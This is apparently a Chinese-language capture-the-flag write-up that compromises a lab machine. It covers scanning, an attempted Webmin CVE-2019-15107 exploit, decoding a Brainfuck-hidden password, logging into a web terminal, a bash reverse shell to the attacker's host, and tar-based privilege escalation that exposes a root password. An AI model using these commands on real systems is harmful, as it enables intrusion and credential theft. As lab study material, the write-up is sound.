目录
前言
Difficulty: Easy
This box was created to be an Easy box, but it can be Medium if you get lost.
难度:简单
这个盒子被创建为一个简单的盒子,但如果你迷路了,它可以是中等的。下载链接
环境介绍
kali 192.168.56.102
靶机 :192.168.56.101
一、信息收集
0x00 arp-scan扫描
这个是101,因为开关靶机地址刷新了,没有对截图做变更
arp-scan -I eth1 -l
0x01 nmap扫描
https://192.168.56.101:10000 https://192.168.56.101:20000 二者页面一致
正常页面
0x02 dirsearch扫描
二、漏洞利用
0x01 webmin 远程代码漏洞
https://github.com/jas502n/CVE-2019-15107
python CVE_2019_15107.py https://192.168.56.101:10000/ "ls"
未发现webmin
0x02 Brainfuck
源码内有Brainfuck 密文
解密:http://www.hiencode.com/brain.html
.2uqPEfj3D<P'a-3
0x03 enum4linux
“enum4linux是Kali Linux自带的一款信息收集工具。它可以收集Windows系统的大量信息,如用户名列表、主机列表、共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等
enum4linux -a ip #做所有简单枚举(-U -S -G -P -r -o -n -i),如果您没有提供任何其他选项,则启用此选项 enum4linux -l ip #通过LDAP 389 / TCP获取一些(有限的)信息(仅适用于DN) enum4linux -o ip #获取操作系统信息 enum4linux -r ip #通过RID循环枚举用户
用户 cyber 密码 .2uqPEfj3D<P'a-3
在10000端口登录失败
在20000端口登录成功
利用终端执行命令
0x04 反弹shell
bash -i >& /dev/tcp/192.168.56.102/9001 0>&1
0x05 搜集信息
在/var/backups目录发现old_pass
三、提权
0x00 tar利用
发现tar可执行
利用tar压缩解压该文件获取权限
权限发生改变
查看old_pass的内容,应该为root的密码
Ts&4&YurgtRX(=~h
提权成功
总结
1、学习到enum4linux的用法。
2、webmin远程代码漏洞【CVE_2019_15107】利用